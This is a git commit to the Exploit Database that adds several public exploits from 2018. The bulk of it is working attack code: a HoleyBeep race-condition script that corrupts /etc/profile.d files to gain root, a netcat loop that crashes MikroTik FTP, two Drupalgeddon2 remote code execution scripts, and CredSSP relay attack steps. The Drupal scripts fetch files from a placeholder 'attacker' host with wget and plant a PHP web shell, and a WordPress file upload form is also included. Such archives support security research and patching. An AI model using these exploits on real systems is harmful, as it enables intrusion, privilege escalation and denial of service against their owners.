DB: 2018-04-14

9 changes to exploits/shellcodes

GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation

Microsoft Credential Security Support Provider - Remote Code Execution

WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload
Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
MikroTik 6.41.4 - FTP daemon Denial of Service PoC
Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
This commit is contained in:
Offensive Security 2018-04-14 05:01:49 +00:00
parent a8b515dd6d
commit bef325a736
8 changed files with 235 additions and 3 deletions

View file

@ -6,9 +6,10 @@ I found the following bug with an AFL-based fuzzer:
When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.
This bug can be reproduced with the following testcase:
*/
$ cat mincore_test.c
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>

90
exploits/linux/local/44452.py Executable file
View file

@ -0,0 +1,90 @@
#!/usr/bin/env python3
#
# E-DB Note ~ https://gist.github.com/Arignir/0b9d45c56551af39969368396e27abe8/ec853f14afd6e86fb3f2efce2086e28f33039ddc
# E-DB Note ~ https://sigint.sh/#/holeybeep
#
# This is an exploit for HoleyBeep.
#
# To use it, place any command you want root to execute in `/tmp/x`.
# ```
# $ cat /tmp/x
# echo PWNED $(whoami)
# ```
# The exploit takes a path to write to (the file must already exist) and rewrites its first bytes to /*/x. This means that if it's a shell script, it will execute /tmp/x as its first and only command.
#
# To gain root access, the idea is to use the exploit to overwrite any file in /etc/profile.d/ so it will execute /*/x on the next login, possibly as the root user.
#
# Variants are possible using cron instead of the shell, so you don't have to wait until root logs in.
#
import argparse
import shutil
import os
import subprocess
import time
import signal
import ntpath
TMP_PATH="beep_exploit"
def backup_output(path):
backup_path = ntpath.basename(path + ".bak")
if os.path.isfile(path):
shutil.copy(path, backup_path)
print('Backup made at \'{}\''.format(backup_path))
def main():
parser = argparse.ArgumentParser(description='Holey beep exploit script.')
parser.add_argument('output', metavar='OUTPUT', help='the output file to corrupt')
parser.add_argument('--path', default="/usr/bin/beep", help='path to beep')
parser.add_argument('--time-low', default=6000, type=int, help='time to wait (micro-seconds), lower bound')
parser.add_argument('--time-high', default=6900, type=int, help='time to wait (micro-seconds), higher bound')
parser.add_argument('--no-backup', action='store_true', help='doesn\'t backup the output file')
args = parser.parse_args()
if not args.no_backup:
backup_output(args.output)
devnull = open("/dev/null")
timer = args.time_low
while True:
# Create original symlink
try:
os.remove(TMP_PATH)
except OSError:
pass
os.symlink("/dev/input/event0", TMP_PATH)
# Open subprocess
p = subprocess.Popen([args.path, "--device", TMP_PATH, "-l", "1", "-n", "-l", "2016356911"], stderr=devnull)
time.sleep(timer/2 / 1000000.0)
# Replace symlink
try:
os.remove(TMP_PATH)
except OSError:
pass
os.symlink(args.output, TMP_PATH)
time.sleep(timer/2 / 1000000.0)
# Trigger SIGINT
os.kill(p.pid, signal.SIGINT)
# Kill process if it's sill alive
time.sleep(200.0 / 1000000.0)
os.kill(p.pid, signal.SIGKILL)
# Verify result
with open(args.output, 'rb') as f:
data = f.read(4)
if data == b'/*/x':
print("Done!")
break
timer += 1
if timer > args.time_high:
timer = args.time_low
if __name__ == '__main__':
main()

View file

@ -0,0 +1,19 @@
################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All Version
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################
for i in `seq 1 100`
do
cat craft | nc -nv <MikroTik IP> 21 &
sleep 2
done

View file

@ -1,3 +1,4 @@
<!--
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
@ -17,6 +18,7 @@ http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.h
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register):
-->
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="datemd5" value="1">
@ -24,6 +26,7 @@ Login as regular user (created using wp-login.php?action=register):
<input value="Upload!" type="submit">
</form>
<!--
File will be visible:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
@ -31,4 +34,5 @@ http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filena
3. Solution:
Update to version 3.0.9
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
-->

21
exploits/php/webapps/44448.py Executable file
View file

@ -0,0 +1,21 @@
#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = raw_input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')

41
exploits/php/webapps/44449.rb Executable file
View file

@ -0,0 +1,41 @@
# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
require 'net/http'
# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit
target = ARGV[0]
command = ARGV[1]
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
shell = "<?php system($_GET['cmd']); ?>"
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
uri = URI(url)
http = Net::HTTP.new(uri.host,uri.port)
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
req = Net::HTTP::Post.new(uri.path)
req.body = payload
response = http.request(req)
if response.code != "200"
puts "[*] Response: " + response.code
puts "[*] Target seems not to be exploitable"
exit
end
puts "[*] Target seems to be exploitable."
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body

View file

@ -0,0 +1,51 @@
# credssp
This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay.
Written by Eyal Karni, Preempt
ekarni@preempt.com
# Build
## Instructions (Linux)
If you are using Ubuntu 14 , check the install file..
It was tested on Ubuntu 16.04.
```
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
```
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip
* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).
* A different version of openssl needed to be installed for this to run successfully. The install script does that.
* Please follow the instructions in the described order.
# Running the exploit
Export a certificate suitable for Server Authentication from any domain.
To generate a suitable certificate for the command to execute :
```
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
```
(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
To run the attack script:
```
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
```
More details are in the usage section of the scripts(--help).

View file

@ -9642,6 +9642,7 @@ id,file,description,date,author,type,platform,port
44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows,
44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux,
44438,exploits/windows_x86/local/44438.txt,"DVD X Player Standard 5.5.3.9 - Buffer Overflow",2018-04-10,"Prasenjit Kanti Paul",local,windows_x86,
44452,exploits/linux/local/44452.py,"GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation",2018-04-06,Pirhack,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16390,6 +16391,7 @@ id,file,description,date,author,type,platform,port
44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -34877,7 +34879,7 @@ id,file,description,date,author,type,platform,port
35726,exploits/php/webapps/35726.py,"Getsimple CMS 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php,
35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php,
35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp,
35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
35730,exploits/php/webapps/35730.html,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
35733,exploits/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,webapps,php,80
35734,exploits/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,webapps,php,
35736,exploits/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",webapps,php,
@ -39143,3 +39145,6 @@ id,file,description,date,author,type,platform,port
44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
44448,exploits/php/webapps/44448.py,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo",webapps,php,

Can't render this file because it is too large.